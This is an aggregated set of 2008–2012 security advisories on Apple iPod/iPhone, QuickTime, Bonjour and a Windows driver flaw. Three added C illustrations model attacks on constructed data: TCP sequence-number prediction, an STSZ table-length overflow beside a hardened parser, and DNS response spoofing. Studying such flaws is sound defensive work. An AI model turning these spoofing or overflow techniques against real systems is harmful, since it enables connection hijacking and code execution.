openSUSE 10.2 http://secunia.com/advisories/product/13375/
SOFTWARE: Novell Open Enterprise Server 1.x http://secunia.com/advisories/product/4664/
DESCRIPTION: SUSE has issued an update for multiple packages.
----------------------------------------------------------------------
TITLE: Fedora update for opensc
SECUNIA ADVISORY ID: SA34362
VERIFY ADVISORY: http://secunia.com/advisories/34362/
DESCRIPTION: Fedora has issued an update for opensc. This fixes some security issues, which can be exploited by malicious people to bypass certain security restrictions. For more information: SA31330 SA34052
SOLUTION: Apply updated packages using the yum utility ("yum update opensc").
ORIGINAL ADVISORY: FEDORA-2009-2267: https://www.redhat.com/archives/fedora-package-announce/2009-March/msg00686.html
OTHER REFERENCES: SA31330: http://secunia.com/advisories/31330/ SA34052: http://secunia.com/advisories/34052/
----------------------------------------------------------------------
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200809-0572 CVE-2008-3631 Apple iPod touch and iPhone Application Sandbox arbitrary file read vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Application Sandbox in Apple iPod touch 2.0 through 2.0.2, and iPhone 2.0 through 2.0.2, does not properly isolate third-party applications, which allows attackers to read arbitrary files in a third-party application's sandbox via a different third-party application. Apple iPod touch and iPhone are prone to multiple remote vulnerabilities: 1. A vulnerability that may allow users to spoof websites. 2. An information-disclosure vulnerability. 3. A remote code-execution vulnerability. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. These issues affect versions prior to iPod touch 2.1 and iPhone 2.1.
----------------------------------------------------------------------
TITLE: Apple iPod Touch Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31823
VERIFY ADVISORY: http://secunia.com/advisories/31823/
CRITICAL: Highly critical
IMPACT: Hijacking, Security Bypass, Spoofing, Exposure of sensitive information, System access
WHERE: From remote
OPERATING SYSTEM: Apple iPod touch http://secunia.com/advisories/product/16074/
DESCRIPTION: Multiple vulnerabilities have been reported in Apple iPod touch, which can be exploited by malicious applications to bypass certain security features and by malicious people to poison the DNS cache, spoof TCP connections, or potentially compromise a user's device.
1) An error in the application sandbox causes it to not properly enforce access restrictions between third-party applications. This can be exploited by one application to read another application's files.
2) Multiple errors exist in the included version of FreeType, which potentially can be exploited by malicious people to execute arbitrary code when accessing specially crafted font data.
For more information: SA30600
3) mDNSResponder does not provide sufficient randomization, which can be exploited to poison the DNS cache. For more information: SA30973
4) Generation of predictable TCP initial sequence numbers can be exploited to spoof TCP connections or hijack sessions.
5) A use-after-free error in WebKit when handling CSS import statements can potentially be exploited to execute arbitrary code via a specially crafted website.
SOLUTION: Update to version 2.1.
PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Nicolas Seriot of Sen:te and Bryce Cogswell. 3) The vendor credits Dan Kaminsky, IOActive.
ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3026
OTHER REFERENCES: SA30600: http://secunia.com/advisories/30600/ SA30973: http://secunia.com/advisories/30973/
----------------------------------------------------------------------
For more information: SA31823. An error in the handling of emergency calls has also been reported. This can be exploited to bypass the Passcode Lock feature and allows users with physical access to an iPhone to launch applications without the passcode
VAR-200809-0567 CVE-2008-3612 Apple iPod touch and iPhone TCP predictable initial sequence number vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
The Networking subsystem in Apple iPod touch 2.0 through 2.0.2, and iPhone 2.0 through 2.0.2, uses predictable TCP initial sequence numbers, which allows remote attackers to spoof or hijack a TCP connection. Apple iPod touch and iPhone are prone to multiple remote vulnerabilities: 1. A vulnerability that may allow users to spoof websites. 2. An information-disclosure vulnerability. 3. A remote code-execution vulnerability. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. These issues affect versions prior to iPod touch 2.1 and iPhone 2.1.
----------------------------------------------------------------------
TITLE: Apple iPod Touch Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31823
VERIFY ADVISORY: http://secunia.com/advisories/31823/
CRITICAL: Highly critical
IMPACT: Hijacking, Security Bypass, Spoofing, Exposure of sensitive information, System access
WHERE: From remote
OPERATING SYSTEM: Apple iPod touch http://secunia.com/advisories/product/16074/
DESCRIPTION: Multiple vulnerabilities have been reported in Apple iPod touch, which can be exploited by malicious applications to bypass certain security features and by malicious people to poison the DNS cache, spoof TCP connections, or potentially compromise a user's device.
1) An error in the application sandbox causes it to not properly enforce access restrictions between third-party applications. This can be exploited by one application to read another application's files.
2) Multiple errors exist in the included version of FreeType, which potentially can be exploited by malicious people to execute arbitrary code when accessing specially crafted font data.
For more information: SA30600
3) mDNSResponder does not provide sufficient randomization, which can be exploited to poison the DNS cache. For more information: SA30973
4) Generation of predictable TCP initial sequence numbers can be exploited to spoof TCP connections or hijack sessions.
5) A use-after-free error in WebKit when handling CSS import statements can potentially be exploited to execute arbitrary code via a specially crafted website.
SOLUTION: Update to version 2.1.
PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Nicolas Seriot of Sen:te and Bryce Cogswell. 3) The vendor credits Dan Kaminsky, IOActive.
ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3026
OTHER REFERENCES: SA30600: http://secunia.com/advisories/30600/ SA30973: http://secunia.com/advisories/30973/
----------------------------------------------------------------------
For more information: SA31823. An error in the handling of emergency calls has also been reported. This can be exploited to bypass the Passcode Lock feature and allows users with physical access to an iPhone to launch applications without the passcode
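Added illustration for the ISN entry above (example code written for this page, not Apple's networking stack): a counter-style generator whose next ISN anyone can extrapolate, beside an RFC 6528-style generator that adds a per-4-tuple offset derived from a secret. Addresses, ports, clock values and the secret are constructed for the demo, and FNV-1a stands in for the MD5 that RFC 6528 specifies.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef struct { uint32_t laddr, raddr; uint16_t lport, rport; } tcp_tuple;

/* Predictable generator in the style of the classic BSD scheme: one global
   counter, +128000 per second and +64000 per connection, no per-tuple term.
   Whoever has seen one ISN and can count seconds and connections knows all
   later ones. */
uint32_t isn_linear(uint32_t seconds, uint32_t connections_so_far) {
    return 128000u * seconds + 64000u * connections_so_far;
}

/* RFC 6528 style: ISN = M + F(laddr, lport, raddr, rport, secret), with M a
   4 us clock and F a keyed hash. RFC 6528 specifies MD5; FNV-1a stands in
   here so the block has no dependencies (an assumption of this demo). */
static uint32_t fnv1a(const uint8_t *p, size_t n, uint32_t h) {
    for (size_t i = 0; i < n; i++) { h ^= p[i]; h *= 16777619u; }
    return h;
}

static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

uint32_t tuple_offset(const tcp_tuple *t, const uint8_t *secret, size_t secret_len) {
    uint8_t buf[12];                     /* fixed serialization, no struct padding */
    put32(buf, t->laddr);
    put32(buf + 4, t->raddr);
    buf[8]  = (uint8_t)(t->lport >> 8); buf[9]  = (uint8_t)t->lport;
    buf[10] = (uint8_t)(t->rport >> 8); buf[11] = (uint8_t)t->rport;
    return fnv1a(secret, secret_len, fnv1a(buf, sizeof buf, 2166136261u));
}

uint32_t isn_rfc6528(uint32_t clock_4us, const tcp_tuple *t,
                     const uint8_t *secret, size_t secret_len) {
    return clock_4us + tuple_offset(t, secret, secret_len);
}

/* Constructed inputs: attacker and victim connect to the same server port
   from different client addresses. */
static const uint8_t   SECRET[16] = { 0x13, 0x37, 0xc0, 0xff, 0xee, 0x42, 0x99, 0x01,
                                      0x7a, 0x5b, 0x3c, 0x2d, 0x1e, 0x0f, 0xa5, 0x5a };
static const tcp_tuple ATTACKER   = { 0x0A000001u, 0xC0A80001u, 443, 40000 };
static const tcp_tuple VICTIM     = { 0x0A000001u, 0xC0A80002u, 443, 40000 };

/* The attacker observes the ISN of a connection he opened himself, then
   guesses the ISN the server will assign to the victim's connection 2 s and
   two connections later. Against the linear scheme the guess is exact. */
bool linear_isn_is_predictable(void) {
    uint32_t observed = isn_linear(10, 5);
    uint32_t victim   = isn_linear(12, 7);
    uint32_t guess    = observed + 128000u * 2 + 64000u * 2;
    return guess == victim;
}

/* Same attack against the keyed generator: extrapolating the clock leaves the
   guess off by F(VICTIM) - F(ATTACKER), which needs the secret to compute. */
bool rfc6528_isn_is_predictable(void) {
    uint32_t observed = isn_rfc6528(1000, &ATTACKER, SECRET, sizeof SECRET);
    uint32_t victim   = isn_rfc6528(1000 + 500000, &VICTIM, SECRET, sizeof SECRET);
    uint32_t guess    = observed + 500000;
    return guess == victim;
}

/* Caveat: for one and the same 4-tuple the offset cancels and the ISN still
   tracks the clock. RFC 6528 hides the offset across tuples, not across time. */
uint32_t rfc6528_same_tuple_delta(void) {
    return isn_rfc6528(7000, &ATTACKER, SECRET, sizeof SECRET)
         - isn_rfc6528(1000, &ATTACKER, SECRET, sizeof SECRET);
}

int main(void) {
    printf("linear ISN guessable: %d\n", linear_isn_is_predictable());
    printf("RFC 6528 ISN guessable across tuples: %d\n", rfc6528_isn_is_predictable());
    printf("RFC 6528 ISN delta on one tuple over 6000 ticks: %u\n",
           (unsigned)rfc6528_same_tuple_delta());
    return 0;
}
```

The two tuples above differ only in the last byte of raddr and agree in every byte after it, so their FNV-1a states are guaranteed to differ (each hash step is a bijection in the state for a fixed input byte); a real deployment relies on the hash being a PRF, not on that property.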
VAR-200809-0573 CVE-2008-3632 Apple iPod touch and iPhone WebKit Cascading Style Sheets (CSS) import use-after-free vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Use-after-free vulnerability in WebKit in Apple iPod touch 1.1 through 2.0.2, and iPhone 1.0 through 2.0.2, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a web page with crafted Cascading Style Sheets (CSS) import statements. Apple iPod touch and iPhone are prone to multiple remote vulnerabilities: 1. A vulnerability that may allow users to spoof websites. 2. An information-disclosure vulnerability. 3. A remote code-execution vulnerability. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. These issues affect versions prior to iPod touch 2.1 and iPhone 2.1.
1) An error in the application sandbox causes it to not properly enforce access restrictions between third-party applications. This can be exploited by one application to read another application's files.
2) Multiple errors exist in the included version of FreeType, which potentially can be exploited by malicious people to execute arbitrary code when accessing specially crafted font data. For more information: SA30600
3) mDNSResponder does not provide sufficient randomization, which can be exploited to poison the DNS cache. For more information: SA30973
4) Generation of predictable TCP initial sequence numbers can be exploited to spoof TCP connections or hijack sessions.
3) The vendor credits Dan Kaminsky, IOActive.
For more information: SA31823. An error in the handling of emergency calls has also been reported. This can be exploited to bypass the Passcode Lock feature and allows users with physical access to an iPhone to launch applications without the passcode.
----------------------------------------------------------------------
TITLE: Apple Safari Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA35379
VERIFY ADVISORY: http://secunia.com/advisories/35379/
DESCRIPTION: Some vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to disclose sensitive information or compromise a user's system.
1) An error in the handling of TrueType fonts can be exploited to corrupt memory when a user visits a web site embedding a specially crafted font. Successful exploitation may allow execution of arbitrary code.
2) Some vulnerabilities in FreeType can potentially be exploited to compromise a user's system. For more information: SA34723
3) Some vulnerabilities in libpng can potentially be exploited to compromise a user's system. For more information: SA33970
4) An error in the processing of external entities in XML files can be exploited to read files from the user's system when a user visits a specially crafted web page.
Other vulnerabilities have also been reported, some of which may also affect Safari version 3.x.
SOLUTION: Upgrade to Safari version 4, which fixes the vulnerabilities.
PROVIDED AND/OR DISCOVERED BY: 1-3) Tavis Ormandy 4) Chris Evans of Google Inc.
ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3613 Chris Evans: http://scary.beasts.org/security/CESA-2009-006.html
OTHER REFERENCES: SA33970: http://secunia.com/advisories/33970/ SA34723: http://secunia.com/advisories/34723/
----------------------------------------------------------------------
===========================================================
Ubuntu Security Notice USN-676-1 November 24, 2008
webkit vulnerability
CVE-2008-3632
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.10
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 8.10: libwebkit-1.0-1 1.0.1-2ubuntu0.1
After a standard system upgrade you need to restart any applications that use WebKit, such as Epiphany-webkit and Midori, to effect the necessary changes
VAR-200809-0206 CVE-2008-3634 Apple iTunes on Mac OS X displays misleading firewall status information CVSS V2: 2.6
CVSS V3: -
Severity: LOW
Apple iTunes before 8.0 on Mac OS X 10.4.11, when iTunes Music Sharing is enabled but blocked by the host-based firewall, presents misleading information about firewall security, which might allow remote attackers to leverage an exposure that would be absent if the administrator were given better information. This issue may lead to a false sense of security, potentially aiding in network-based attacks. Versions prior to Apple iTunes 8.0 are vulnerable to this issue
VAR-200809-0201 CVE-2008-3628 Apple QuickTime on Windows invalid pointer vulnerability in PICT image processing CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, related to an "invalid pointer issue". These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability'); CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player.
----------------------------------------------------------------------
TITLE: Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31821
VER
IFY ADVISORY: http://secunia.com/advisories/31821/
CRITICAL: Highly critical
IMPACT: System access
WHERE: From remote
SOFTWARE: Apple QuickTime 7.x http://secunia.com/advisories/product/5090/
DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system.
1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file.
2) A boundary error in QuickTimeInternetExtras.qtx when parsing files via the third-party Indeo3.2 codec for QuickTime can be exploited to cause a stack-based buffer overflow via a specially crafted movie file.
3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file.
4) A boundary error in the parsing of panorama PDAT atoms in QTVR movie files can be exploited to cause a stack-based buffer overflow via a QTVR file containing specially crafted "maxTilt", "minFieldOfView", and "maxFieldOfView" elements.
6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing an overly large entry in sample_size_table.
7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code.
SOLUTION: Update to version 7.5.5.
QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html
QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html
QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Paul Byrne, NGSSoftware.
2) Reported by an anonymous person via ZDI.
3) The vendor credits Roee Hay, IBM Rational Application Security Research Group.
4) Reported by an anonymous person via ZDI.
5) Reported by an anonymous person via iDefense VCP.
6) Reported by an anonymous person via ZDI.
7) Reported by an anonymous person and Subreption via ZDI.
8) The vendor credits David Wharton.
ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT3027
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-08-057/
http://www.zerodayinitiative.com/advisories/ZDI-08-058/
http://www.zerodayinitiative.com/advisories/ZDI-08-059/
http://www.zerodayinitiative.com/advisories/ZDI-08-060/
http://www.zerodayinitiative.com/advisories/ZDI-08-061/
http://www.zerodayinitiative.com/advisories/ZDI-08-062/
iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744
----------------------------------------------------------------------
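Added illustration for item 6 above (STSZ atoms with an overly large sample_size_table entry). This is example code written for this page, not QuickTime's parser: the atom layout is the standard QuickTime/ISO one, the atoms fed to it are constructed in the block, and the "naive" function only shows the class of arithmetic a table-length check must avoid.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout of an 'stsz' (sample size) atom, big-endian:
     size(4) 'stsz'(4) version(1) flags(3) sample_size(4) sample_count(4)
     [entry_size(4) x sample_count, present only when sample_size == 0] */

enum { STSZ_OK = 0, STSZ_TRUNCATED = -1, STSZ_BAD_TYPE = -2,
       STSZ_COUNT_TOO_BIG = -3, STSZ_SUM_OVERFLOW = -4 };

typedef struct {
    uint32_t sample_size;   /* one size for all samples, or 0 if a table follows */
    uint32_t sample_count;
    uint64_t total_bytes;   /* sum of all sample sizes, kept in 64 bits */
} stsz_info;

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* The arithmetic a careless parser does before allocating or copying the
   table: sample_count * 4 in 32 bits wraps for counts >= 0x40000000, so a
   huge count yields a tiny buffer and the subsequent copy overruns it. */
uint32_t stsz_table_bytes_naive(uint32_t sample_count) {
    return sample_count * 4u;
}

/* Hardened parse: the count is checked against the atom's own length before
   any entry is read, and the check divides instead of multiplying so that it
   cannot itself overflow. */
int parse_stsz(const uint8_t *buf, size_t len, stsz_info *out) {
    if (len < 20) return STSZ_TRUNCATED;
    uint32_t atom_size = be32(buf);
    if (memcmp(buf + 4, "stsz", 4) != 0) return STSZ_BAD_TYPE;
    if (atom_size < 20 || atom_size > len) return STSZ_TRUNCATED;
    out->sample_size  = be32(buf + 12);        /* buf+8..11: version and flags */
    out->sample_count = be32(buf + 16);
    out->total_bytes  = 0;
    if (out->sample_size != 0) {               /* fixed-size form, no table */
        out->total_bytes = (uint64_t)out->sample_size * out->sample_count;
        return STSZ_OK;
    }
    if (out->sample_count > (atom_size - 20) / 4) return STSZ_COUNT_TOO_BIG;
    for (uint32_t i = 0; i < out->sample_count; i++) {
        out->total_bytes += be32(buf + 20 + 4 * (size_t)i);
        if (out->total_bytes > UINT32_MAX)      /* policy: offsets must fit 32 bits */
            return STSZ_SUM_OVERFLOW;
    }
    return STSZ_OK;
}

/* Constructed-input builder: writes a table-form atom. declared_count may
   disagree with the number of entries actually written, which is exactly how
   a hostile file lies to the parser. */
size_t build_stsz(uint8_t *out, size_t cap, uint32_t declared_count,
                  const uint32_t *sizes, size_t n) {
    size_t total = 20 + 4 * n;
    if (total > cap) return 0;
    put32(out, (uint32_t)total);
    memcpy(out + 4, "stsz", 4);
    put32(out + 8, 0);                /* version 0, flags 0 */
    put32(out + 12, 0);               /* sample_size 0: per-sample table follows */
    put32(out + 16, declared_count);
    for (size_t i = 0; i < n; i++) put32(out + 20 + 4 * i, sizes[i]);
    return total;
}

int main(void) {
    uint8_t buf[64];
    stsz_info info;
    const uint32_t sizes[3] = { 100, 200, 300 };
    size_t n = build_stsz(buf, sizeof buf, 0x40000001u, sizes, 3);
    printf("naive table bytes for count 0x40000001: %u\n",
           (unsigned)stsz_table_bytes_naive(0x40000001u));
    printf("hardened parse result: %d (expected %d)\n",
           parse_stsz(buf, n, &info), STSZ_COUNT_TOO_BIG);
    return 0;
}
```

The same shape of check applies to every count-prefixed table in a container format: bound the count by the bytes actually present, never by what the header claims, and accumulate sizes in a type wider than the field.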
VAR-200809-0203 CVE-2008-3630 Apple Bonjour for Windows Bonjour Namespace Provider DNS response spoofing vulnerability CVSS V2: 6.4
CVSS V3: -
Severity: MEDIUM
mDNSResponder in Apple Bonjour for Windows before 1.0.5, when an application uses the Bonjour API for unicast DNS, does not choose random values for transaction IDs or source ports in DNS requests, which makes it easier for remote attackers to spoof DNS responses, a different vulnerability than CVE-2008-1447. A third party may spoof DNS responses so that a forged address is accepted as legitimate. An attacker may leverage this issue to forge unicast hostname resolution responses in applications that use the Bonjour API for DNS. Successful exploits allow attackers to redirect network traffic, which can aid in man-in-the-middle attacks. Versions prior to Bonjour for Windows 1.0.5, included in Apple iTunes 8.0, are vulnerable to this issue.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-05
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: mDNSResponder: Multiple vulnerabilities
Date: January 20, 2012
Bugs: #290822
ID: 201201-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in mDNSResponder, which could lead to execution of arbitrary code with root privileges.
Background
==========
mDNSResponder is a component of Apple's Bonjour, an initiative for zero-configuration networking.
Affected packages
=================
Package / Vulnerable / Unaffected
1 net-misc/mDNSResponder < 212.1 >= 212.1
Description
===========
Multiple vulnerabilities have been discovered in mDNSResponder. Please review the CVE identifiers referenced below for details.
Impact
======
A local or remote attacker may be able to execute arbitrary code with root privileges or cause a Denial of Service.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All mDNSResponder users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-misc/mDNSResponder-212.1"
NOTE: This is a legacy GLSA. Updates for all affected architectures are available since November 21, 2009. It is likely that your system is already no longer affected by this issue.
References
==========
[ 1 ] CVE-2007-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2386
[ 2 ] CVE-2007-3744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3744
[ 3 ] CVE-2007-3828 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3828
[ 4 ] CVE-2008-0989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0989
[ 5 ] CVE-2008-2326 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2326
[ 6 ] CVE-2008-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3630
Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
----------------------------------------------------------------------
1) A NULL pointer dereference error in the Bonjour Namespace Provider component when resolving ".local" domain names can be exploited to crash the application via a specially crafted ".local" domain name containing an overly long DNS label.
SOLUTION: Update to version 1.0.5.
http://www.apple.com/support/downloads/bonjourforwindows105.html
PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Mario Ballano, 48bits.com. 2) Reported by the vendor.
ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT2990
----------------------------------------------------------------------
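Added model for the Bonjour entry above (example code written for this page, not Apple's resolver) of why a fixed source port and a counting transaction ID make the resolver's answer check worthless: an off-path attacker who has seen one query forges the answer to the next one with a single packet, whereas a fresh random TXID and port per query leave him guessing a 32-bit pair. The server address, the answer address, the port numbers, the PRNG seed and the names are constructed; xorshift32 stands in for the OS CSPRNG a real resolver would use.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint32_t server_ip;
    uint16_t src_port;
    uint16_t txid;
    char     qname[64];
} dns_query;

typedef struct {
    uint32_t from_ip;
    uint16_t dst_port;
    uint16_t txid;
    char     qname[64];
    uint32_t answer_ip;
} dns_response;

/* Everything a stub resolver can check on a UDP answer: the sender, the port
   it was sent to, the 16-bit transaction ID and the question. When the port
   and TXID are guessable, this check stops nothing. */
bool response_accepted(const dns_query *q, const dns_response *r) {
    return r->from_ip == q->server_ip && r->dst_port == q->src_port &&
           r->txid == q->txid && strcmp(r->qname, q->qname) == 0;
}

typedef struct {
    bool     randomized;
    uint16_t next_txid;     /* predictable mode: a counter */
    uint16_t fixed_port;    /* predictable mode: one port for every query */
    uint32_t rng;           /* randomized mode: secret PRNG state */
} resolver;

/* Resolver A, behaving as the entry describes: fixed port, counting TXID. */
void resolver_init_predictable(resolver *r) {
    r->randomized = false; r->next_txid = 0x1000; r->fixed_port = 1500; r->rng = 0;
}

/* Resolver B: a fresh TXID and source port per query drawn from secret state. */
void resolver_init_random(resolver *r, uint32_t secret_seed) {
    r->randomized = true; r->rng = secret_seed ? secret_seed : 1u;
    r->next_txid = 0; r->fixed_port = 0;
}

static uint32_t xorshift32(uint32_t *s) {
    uint32_t x = *s;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *s = x;
}

void resolver_query(resolver *r, const char *qname, dns_query *q) {
    q->server_ip = 0x08080808u;                 /* constructed upstream server */
    strncpy(q->qname, qname, sizeof q->qname - 1);
    q->qname[sizeof q->qname - 1] = '\0';
    if (!r->randomized) {
        q->txid = r->next_txid++;
        q->src_port = r->fixed_port;
    } else {
        uint32_t v = xorshift32(&r->rng);
        q->txid = (uint16_t)v;
        q->src_port = (uint16_t)(1024u + (v >> 16) % 64512u);   /* 1024..65535 */
    }
}

/* Attacker: sees one query (say, one he provoked), then races the real answer
   to the victim's next query with `budget` forgeries that reuse the port he
   saw and try TXIDs upward from the one he saw. Returns whether any forgery
   passes response_accepted(). */
bool spoof_next_query(resolver *r, const char *victim_qname, unsigned budget) {
    dns_query seen, victim;
    resolver_query(r, "attacker.example", &seen);
    resolver_query(r, victim_qname, &victim);
    dns_response f;
    memset(&f, 0, sizeof f);
    f.from_ip = seen.server_ip;                 /* the server address is public */
    f.dst_port = seen.src_port;
    f.answer_ip = 0x0A0A0A0Au;                  /* attacker-controlled address */
    strncpy(f.qname, victim_qname, sizeof f.qname - 1);
    for (unsigned i = 1; i <= budget; i++) {
        f.txid = (uint16_t)(seen.txid + i);
        if (response_accepted(&victim, &f)) return true;
    }
    return false;
}

int main(void) {
    resolver p, s;
    resolver_init_predictable(&p);
    resolver_init_random(&s, 0x5EEDu);
    printf("predictable resolver, 1 forgery:     %s\n",
           spoof_next_query(&p, "bank.example", 1) ? "hijacked" : "safe");
    printf("randomized resolver, 1000 forgeries: %s\n",
           spoof_next_query(&s, "bank.example", 1000) ? "hijacked" : "safe");
    return 0;
}
```

With the seed used here the randomized resolver's two queries land on different source ports, so none of the thousand forgeries is accepted; in general the attacker's per-packet odds drop from 1 to roughly 1 in 2^32.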
VAR-200809-0208 CVE-2008-3636 Gear Software CD DVD Filter driver privilege escalation vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. Apple iTunes on Windows ships a third-party driver that exposes this integer overflow, so a malicious local user may elevate privileges. Local attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial-of-service condition. Windows is a very popular operating system of Microsoft Corporation.
[ HTML FORMATTED Advisory ] http://www.wintercore.com/advisories/advisory_W021008.html
[TEXT VERSION]
GearSoftware Powered Products Local Privilege Escalation
+ GEARASpiWDM.sys Insecure Method
+ Microsoft Windows Kernel IopfCompleteRequest Integer Overflow
:: Summary
1. Background
2. Non-technical description
3. Technical Description
4. Exploiting it
5. References
6. Affected Products
7. Credits
8. Disclosure Timeline
9. Contact
1. Background
"GEAR develops solutions for professional premastering, DVD editing and authoring, and is also a leading provider of development tools that enable software companies to integrate optical recording technology into their own products. GEAR technology is integrated into solutions from some of the world's most prominent technology organizations, including Apple, Symantec, Siemens, Kodak, Philips and Bosch, among many others" www.gearsoftware.com
2. Non-technical description
However, the attack vector needed to take advantage of this weakness has not been identified on an out-of-the-box Windows installation. Therefore, a third-party application is, so far, the only possible attack vector for exploiting this issue. This advisory covers the attack vector found in a widely distributed licensed application, the GearSoftware Recording SDK, which was exposing the kernel flaw to user-mode attackers through one of its filter drivers: GEARAspiWDM.sys. Since this driver is a licensed solution, it is bundled with several well-known products.

To clarify this vulnerability as much as possible, we should distinguish three different elements which make up the problem.

1. The Underlying Vulnerability: Microsoft Windows Kernel IopfCompleteRequest Integer Overflow.
2. The Attack Vector: GearAspiWDM.sys Insecure Method.
